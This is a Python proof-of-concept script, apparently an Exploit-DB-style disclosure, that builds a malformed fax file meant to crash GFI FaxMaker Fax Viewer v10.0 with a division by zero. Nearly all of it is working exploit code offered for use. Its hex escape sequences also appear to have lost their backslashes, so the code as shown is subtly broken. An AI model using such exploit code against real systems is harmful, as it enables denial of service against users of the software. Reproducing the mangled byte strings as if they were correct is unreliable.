#!/usr/bin/python
 
# Title: GFI Faxmaker Fax Viewer v10.0[build 237] DoS (Poc).
# From: The eh?-Team || The Great White Fuzz (we're not sure yet)
# Found by: loneferret
# Home: http://www.kioptrix.com
# Manifacturer's link: http://www.gfi.com
  
# Date Found: Oct 28th 2011
# Tested on: Windows XP SP3 Professional English / Windows 7 Professional 64bit French
# Tested with: 32bit & 64bit versions of Faxmaker
# Nod to the Exploit-DB Team

# Software Description:
# GFI FaxMaker is a market leading fax server software for Exchange Server, 
# Lotus Domino, SMTP/POP3, which makes sending and receiving faxes an efficient, 
# simple and cheaper process. GFI FaxMaker allows users to receive and send faxes 
# directly from their email client.

# We get an "Integer division by zero" in Immunity when opening the fax file.
# Nothing fancy, but maybe something can do more... eventually.
# As always, have fun.
# loneferret

head = ("x49x49x2Ax00x08x00x00x00x10x00xFEx00x04"
"x00x01x00x00x00x02x00x00x00x00x01x03x00x01x00x00x00"
"xC0x06x00x00x01x01x04x00x01x00x00x00x94x08x00x00x02"
"x01x03x00x01x00x00x00x01x00x00x00x03x01x03x00x01x00"
"x00x00x03x00x00x00x06x01x03x00x01x00x00x00x00x00x00"
"x0Ax01x03x00x01x00x00x00x02x00x00x00x11x01x04x00x01"
"x00x00x00xDEx00x00x00x15x01x03x00x01x00x00x00x01x00"
"x00x00x16x01x04x00x01x00x00x00x94x08x00x00x17x01x04"
"x00x01x00x00x00xB0xF8x00x00x1Ax01x05x00x01x00x00x00"
"xCEx00x00x00x1Bx01x05x00x01x00x00x00xD6x00x00x00x1C"
"x01x03x00x01x00x00x00x01x00x00x00x24x01x04x00x01x00"
"x00x00x04x00x00x00x28x01x03x00x01x00x00x00x02x00x00"
"x00x00x00x00x00xCCx00x00x00x01x00x00")

buffer = "x41" * 5
buffer += "0" * 4 # <-- " Well there's your problem! "



badfax = head + buffer

file=open('bad_fax.fax','w')
file.write(badfax) 
file.close()